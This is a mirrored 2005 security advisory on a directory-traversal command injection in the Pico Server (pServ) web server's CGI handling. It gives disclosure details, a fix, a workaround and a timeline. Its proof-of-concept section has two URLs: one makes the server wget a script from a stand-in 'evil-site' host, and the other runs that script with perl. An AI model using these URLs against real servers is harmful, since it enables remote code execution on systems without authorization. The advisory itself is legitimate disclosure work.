Lucene search

K

pservBad.txt

🗓️ 14 Aug 2005 00:00:00Reported by tsyklon.informatik.rwth-aachen.deType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Pico Server Remote Command Injection allows a remote attacker to execute arbitrary commands

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2005-1365
16 May 200504:00
nvd
securityvulns
[Full-disclosure] Pico Server (pServ) Remote Command Injection
16 May 200500:00
securityvulns
Cvelist
CVE-2005-1365
16 May 200504:00
cvelist
CVE
CVE-2005-1365
16 May 200504:00
cve
` Advisory: Pico Server (pServ) Remote Command Injection  
  
RedTeam found a remote command injection in Pico Server (pServ) which results  
in a remote attacker being able to issue arbitrary commands on the server.  
  
Details  
=======  
  
Product: Pico Server (pServ)  
Affected Version: 3.2(verified), <=3.2 probably too  
Immune Version: 3.3  
OS affected: all  
Security-Risk: very high  
Remote-Exploit: yes  
Vendor-URL: http://pserv.sourceforge.net/  
Vendor-Status: new version available  
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010  
Advisory-Status: published  
CVE: CAN-2005-1365  
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #)  
  
  
Introduction  
============  
>From http://pserv.sourceforge.net/  
Pico Server is a small web server. It is meant to be portable and  
configurable.  
  
* small, portable  
* fast  
* CGI-BIN support  
* auto-indexing of directories  
* access and error logging (see p-reporter for an analyzer)  
* forking or single-connection at choice  
  
Pico Server (pServ) is written in portable C (K&R style so it can compile on  
older compilers too) and sports several options that by means of #define  
statements can customize the behavior, the performance and the feature set so  
to be able to fit better the the requisites.  
  
If pServ is compiled with support for CGI-BIN a remote attacker is able to  
execute any program (with pServ permissions) on the server by traversing out  
of the cgi-bin directory.  
  
More Details  
============  
  
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as  
cgi-scripts.  
To avoid that a user traverses out of the cgi-bin using traditional /../,  
pServ parses the requested url. It increases a counter by one if it parses a  
/ (new subdir) and decreases the counter if ist parses /../. If the counter  
goes below zero the url is rejected as illegal. Unfortunately an attacker can  
avoid beeing rejected, just using enough / in the url (without directory  
names between them), so he can traverse out of the cgi-bin by adding some  
/../ . This lets the attacker execute any program on the server (with pServ  
permissions).  
  
Proof of Concept  
================  
  
The following url downloads a script (or executable) to the server:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl  
  
This is how the script can be executed afterwards:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl  
  
  
Workaround  
==========  
  
The only workaround is to compile pServ without support for cgi-bin.  
  
Fix  
===  
  
The Developers have released Version 3.3. This version should fix the  
problem. The changes have not been tested by RedTeam, yet.  
  
Security Risk  
=============  
  
The security risk is rated very high because a remote attacker can use this  
flaw to execute arbitrary code on the server (with the permissions of pServ).  
  
History  
=======  
  
2005-04-29 found  
2005-05-02 first attempt to inform developers  
2005-05-02 CAN-number assigned  
2005-05-04 second attempt to inform developers  
2005-05-16 new version released. Advisory published  
  
RedTeam  
=======  
  
RedTeam is a penetration testing group working at the Laboratory for  
Dependable Distributed Systems at RWTH-Aachen University. You can find more  
Information on the RedTeam Project at  
http://tsyklon.informatik.rwth-aachen.de/redteam/  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Aug 2005 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.01957
25
.json
Report